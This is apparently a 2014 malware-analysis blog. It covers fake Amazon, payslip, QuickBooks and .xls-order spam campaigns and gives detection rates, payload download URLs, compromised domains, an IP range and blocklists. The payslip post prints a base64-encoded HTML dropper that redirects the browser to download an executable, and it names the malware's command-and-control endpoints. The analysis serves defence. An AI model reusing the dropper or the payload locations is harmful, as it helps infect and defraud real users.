Obviously, this is a ZIP file. It contains a malicious executable Document-95722.scr which has a VirusTotal detection rate of just 1/54. The CAMAS report shows that the malware reaches out to the following locations to download further components:
andribus.com/images/images.rar
owenscrandall.com/images/images.rar

Incidentally, if you add a "+" to the end of the goo.gl URL you can see how many people have clicked through. For example:

164 clicks isn't a lot, but there are multiple URLs in use.

Recommended blocklist:
andribus.com
owenscrandall.com
esys-comm.ro
autoescuelajoaquin.com
pinkfeatherproductions.com

Wednesday 30 July 2014

"Payslip" spam

Presumably terseness works with this kind of message:

From:    Richard Mason [richardm254@gmail.com]
Date:    30 July 2014 21:23
Subject:    Payslip

Please find attached the payment slip.

Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

Clicking OK downloads an executable from www.greenexpress.ge/swift//payslip.exe which your are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..

..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded.

--14dae94734a32fac0a04ff6eee7c--
--14dae94734a32fac0e04ff6eee7e
Content-Type: text/html; charset=US-ASCII; name="swift copy-Payment-Slip-$70,000.html"
Content-Disposition: attachment;
filename="swift copy-Payment-Slip-$70,000.html"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_hy93oezq0

DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0IiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPiAN
CiAgICAgICBhbGVydCgnVG8gdmlldyB5b3VyIEJhbmstUGF5bWVudC1TbGlwLCBjbGljayBvayB0
byBjb250aW51ZS4nKTsNCiAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICdodHRwOi8vd3d3LmdyZWVu
ZXhwcmVzcy5nZS9zd2lmdC8vcGF5c2xpcC5leGUnOyANCiAgICA8L3NjcmlwdD4gDQoNCg0KDQo=
--14dae94734a32fac0e04ff6eee7e--

The malware itself has a VirusTotal detection rate of 31/53 which is frankly better than I'd expect. Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter:

URL: http://www.greenexpress.ge/swift/config.bin
TYPE: GET
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

URL: http://www.greenexpress.ge/swift/gate.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

"AMAZON.CO.UK - Your Amazon order" spam

Another fake Amazon spam with a malicious payload:

Date:     Wed, 30 Jul 2014 18:08:43 +0800 [06:08:43 EDT]
From:     "AMAZON.CO.UK" [ckggzphqu@Amazon.co.uk]
Subject:     Your Amazon order #853-9908013-4362599

Hello,

Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details

Order #853-9908013-4362599 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.
Amazon.co.uk

There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53. The Comodo CAMAS report shows that it downloads a further component from these following locations:

utilatas.com/333
sdi-ppe.com/333
shahlon.com/333
croydonsog.org/333
pc2print.co.uk/333
geo.num.edu.mn/333
hendredestate.co.uk/333
kelias.com/~anonimas/333
168.144.179.82/333
alperacarli.com/333
thecolabnetwork.com/333
www.deltaplus.com.sg/333
george-bergsig.co.za/333
qatthailand.com/333
deltaplus.com.sg/333
elegantscreens.com/333
drkeithrix.co.uk/333
w3stest.webuda.com/333
www.divine-paradise.com/333
www.langrace.com/333
avengingarden.com/333

This second executable has a VT detection rate of 5/54. I recommend blocking the following sites:
utilatas.com
sdi-ppe.com
shahlon.com
croydonsog.org
pc2print.co.uk
geo.num.edu.mn
hendredestate.co.uk
alperacarli.com
thecolabnetwork.com
deltaplus.com.sg
george-bergsig.co.za
qatthailand.com
deltaplus.com.sg
elegantscreens.com
drkeithrix.co.uk
w3stest.webuda.com
divine-paradise.com
langrace.com
avengingarden.com

"Order status -950533 30.07.2014.xls" spam

This body-text-less spam comes with a malicious attachment.

Date:     Wed, 30 Jul 2014 17:06:27 +0530 [07:36:27 EDT]
From:     Twila Garner [3f418d9@consolacionburriana.com]
Subject:     Order status -950533 30.07.2014.xls

Actually the body text isn't completely blank but does contain some bits of HTML.

<html>
<head>

<XSSCleaned_taghttp-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<br>
</

But the payload is the thing, in this case there is an archivecalled 950533-30.07.2014.zip containing a folder order-8301138-30.07.2014.xls which in turn contains a malicious executable order-8301138-30.07.2014.xls.exe which has a VirusTotal detection rate of 6/54.

The Comodo CAMAS report shows attempted downloads from the following connections:

jobengine.in/333
legusadvantage.com/333
davidtaylorartist.com/333
asustabletservisi.com/333
mycustomkidsbooks.com/333
redhorsesolutions.com/333
tencoolthings.com/333
wwwtokiodesign.com/333
extreme-bdsm-comics.com/333

A second file is downloaded from these locations with a VT detection rate of just 2/54. The CAMAS report is inconclusive.

I recommend the following blocklist:
jobengine.in
legusadvantage.com
davidtaylorartist.com
asustabletservisi.com
mycustomkidsbooks.com
redhorsesolutions.com
tencoolthings.com
wwwtokiodesign.com
extreme-bdsm-comics.com

QuickBooks "Important - Payment Overdue" spam has a malicious PDF attachment

This fake QuickBooks Invoice spam comes with a malicious payload:

From:    QuickBooks Invoice [auto-invoice@quickbooks.com]
Date:    29 July 2014 23:08
Subject:    Important - Payment Overdue

Please find attached your invoices for the past months. Remit the payment by 07/30/2014 as outlines under our "Payment Terms" agreement.

Thank you for your business,

Sincerely,
Josephine Shirley

This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.

The attached file (in this case invoice_7564675_07292014.pdf) contains an exploit with a VirusTotal detection rate of 7/53. I haven't had a chance to analyse the exploit myself yet.

Tuesday 29 July 2014

Something evil on 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 (31.210.96.152/29)

[Note, an update to this can be found here]

I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using hijacked GoDaddy domains, and are targeting victim websites by altering their .htaccess files to intercept traffic coming from search engines such as Google.

These IP addresses have been used for malware for some time and certainly historically they have been used for Ponmocup. I can't confirm that this is still the case, but given the bad IP and the obvious .htaccess hijack then it passed the Duck Test.

These IPs are allocated to Radore Veri Merkezi Hizmetleri A.S. in Turkey who control 31.210.64.0/18 which is a large block, so these IPs are probably a customer or even a customer of a customer.

VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29 which I would very strongly recommend blocking that range, or indeed the entire /24 looks pretty worth

These domains all use the GoDaddy domaincontrol.com nameservers, which naturally means most of them are GoDaddy domains.. but not all of them, some are from other registrars. This list [pastebin] includes a selection of active subdomains that I can find.

I recommend permablocking the following IP range and temporarily blocking the following domains:

31.210.96.152/29
12stepdates.com
2cuonline.com
4runnerliftkits.com
8jutawan.com
advertisementdevil.com
allknowingpsychic.com
alloyfurnacerolls.com
alloymuffles.com
alloyradianttubes.com
allprodelta.com
alternateolympics.com
alternativeolympics.com
ancestorworshippublishing.com
antonzuponcic.com
aredietsok.com
assistlist.com
atvguidebooks.com
atvtrailguides.com
autoeventregistration.com
automotiveeventregistration.com
automotiveservicesavings.com
autoserviceevent.com
aylesburyironing.com
bahenasteel.com
barbeveragesla.com
basicmechanical.net
be3ne.com
be3ni.com
be3ny.com
benahavisrealestate.com
bestsilvercufflinks.com
blurlight.com
boeckman.net
bristolblog.com
buynewaz.com
bvvk.com
caninecolorgenetics.com
castlelawpa.com
charlesawells.com
chrisvessey.com
concept-kw.com
connectmetv.com
coreywasley.com
craigslistpads.com
cruzeonover.com
custom-chocolate-favors.com
customerdevil.com
dealerholidayevent.com
deliveredbythedevil.com
devilforacause.com
devilwithacause.com
djbobbyktoronto.com
drinkbluphoria.com
drinkcalories.net
dunstablekitchens.com
egunt.com
ellagphotography.com
encepha.net
enhancementlasers.com
enhancementlasers.net
e-squares.com
exceltoner.com
fantasyintro.com
fathersnsons.com
fatlosstoolkit.com
fortheloveofgadgets.com
gamezalot.com
gaybeefcake.com
gaybromance.com
gayconspiracy.com
gillspools.com
girlsgoneglamis.com
gliscastings.net
gliscentrifugal.com
glisfabrications.com
glisinc.com
golfironworks.com
golfnewsarkansas.com
golfnewscolorado.com
golfnewsconnecticut.com
golfnewsdelaware.com
golfnewsgeorgia.com
golfnewsindiana.com
golfnewsiowa.com
golfnewskansas.com
golfnewslouisiana.com
golfnewsmississippi.com
golfnewsmontana.com
golfnewsnebraska.com
golfnewsnewengland.com
golfnewsnewhampshire.com
golfnewsnewjersey.com
golfnewsnewyork.com
golfnewsohio.com
golfnewsoklahoma.com
golfnewssouthcarolina.com
golfnewstennessee.com
golfnewsutah.com
golfnewsvermont.com
golfnewswestvirginia.com
golfnewswisconsin.com
grafikcase.com
grafik-devils.com
gravittyproductions.com
greatserviceforless.com
gregorylknox.net
gryphonaz.com
gryphonus.com
gssportspics.com
hartford-capital.com
heattreatalloy.com
historyhobbybooks.com
hockeydoneright.com
hugesavingsevent.com
imfamousontheinternet.com
inboccaproductions.com
ingressgamer.com
inkandtonersale.com
italy-in-bocca.com
javaemulator.com
jaysonkrausenetwork.com
joannheilman.com
joeamericashow.com
joechenphoto.com
joeywilliamsdrums.com
jordandowney.com
jordandowney.net
juddnelsonstudio.com
kaitlinsplayground.com
killpoet.com
kokobon.com
ksupridewrestling.com
ksuwrestling.net
lakehousetimberranch.com
laser-enhancements.com
letseatinitaly.com
lifestylology.com
lindseytoothman.com
lionizetheworld.com
lions-mark.com
lsclinks.com
magicalmoods.com
makingwaves-salon.com
matthewstarner.com
memorialdaysavingsevent.com
menbeingsexy.com
middlefieldma.net
midnightastronomy.com
momsagainstmercury.com
mrsstyleseeker.com
musicjester.com
mwhiteman.com
myabadi.com
mycameraleash.com
myfuturephysique.com
mygaycrush.com
mystagingbox.com
myteacuppiggies.com
nacprint.com
newcarsat.com
newlogiq.com
newyorkjester.com
newyorkmascot.com
ngage-games.com
nutritionbydesign.com
oharvest.net
omobia.net
onlybetterdeal.com
organixharvest.com
panochevalleysolar.net
pascocountyhitmen.com
paxamericanaspirits.com
peekaboopumpkin.com
prestigehonda.net
propertiespain.com
realdealpsychic.com
reikisolar.com
renzograciemexico.com
restoremystuff.com
rled.net
roaringlion.com
room-depot.com
savedalyfield.com
schonbjj.com
sciencehunk.com
searchengineverified.com
secretmanclub.com
sellitandforgetittoday.com
snuffbottleworld.net
softmn.com
southvalleyrugby.com
sportdoneright.com
springcleaningevent.com
stainlessfabrications.com
strongpsychic.com
sullivan-county.com
tagdeed-translation.com
techsupportauction.com
telecomchicago.com
telecomillinois.com
telecomindiana.com
telecommichigan.com
thecinema6.com
thecollegeaddressshop.com
theeveningjoker.com
theknowledgekingdom.com
thenightlyjoker.com
thinkadmit.com
thisishowthisworks.com
thruellaseyes.com
timkennywebdesign.com
timsicecreamtruck.com
timsroadtrip.com
tri-swelding.com
uksportbook.com
usedcarsat.com
usedmobi.com
valentinesalesevent.com
vehicleexchangeprogram.com
vehicleservicediscount.com
vipoverload.com
virtualsofts.com
webrunchhard.com
wenerdhard.com
whhholdingusainc.com
whhusainc.net
whichcameratookthis.com
whybuyanewhome.com
workoutebook.com
worldblogsite.com
wrightdunbar.com
xn--80afcbdab0arg8e4c.com
xn--h1adlaje.net
yourcakedecoratingclass.com
yourcrystalball.com
yourspartanmovers.com
zoomtoner.com
zoopoints.com
z-sat.com

Note that the following domains have been cleaned up and are probably now safe.
apossibletruth.com
arrozconbeans.com
brads-test-site.com
casabodamia.com
catclinicgreensboro.com
charlestonremembered.com
chelseyfatula.com
creepyninja.com
ditchwindows.com
drdekloet.com
ebookleads.com
electhillary2016.com
evergentleonmymind.com
fasttwitterfollowers.com
foreverlivingon.com
gaycharacter.com
goldenpridewrestling.com
greensboroveterinarian.net
jcbsunglasses.com
jpcolton.com
kalkaneventfactory.com
newskase.com
pitstopmotorclub.com
registerforautoevent.com
remembercharleston.com
ridchinacne.com
saving53k.com
southernwakeautomotive.com
theneighborhoodaddressshop.com
ux-designer.com
williespage.com
windmuff.com

Monday 28 July 2014

amazon.co.uk "Your Amazon order" spam

This fake Amazon spam comes with a malicious attachment:

Date:     Mon, 28 Jul 2014 13:15:57 +0200 [07:15:57 EDT]
From:     "AMAZON.CO.UK" [egljlyzqv@Amazon.co.uk]
Subject:     Your Amazon order #239-1744919-1697181

Hello,

Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details

Order #239-1744919-1697181 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.
Amazon.co.uk

Attached is a file Order-239-1744919-1697181.zip which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54.

The Comodo CAMAS analysis shows that the malware reaches out to a familiar set of URLs to download further components:

www.zag.com.ua/333
daisyblue.ru/333
www.ricebox.biz/333
brandsalted.com/333
fbcashmethod.ru/333
expositoresrollup.es/333
madrasahhusainiyahkl.com/333
sexyfoxy.ts6.ru/333
www.huework.com/333
siliconharbourng.com/333
www.martijnvanhout.nl/333

I would recommend blocking the following domains:
zag.com.ua
daisyblue.ru
ricebox.biz
brandsalted.com
fbcashmethod.ru
expositoresrollup.es
madrasahhusainiyahkl.com
sexyfoxy.ts6.ru
huework.com
siliconharbourng.com
martijnvanhout.nl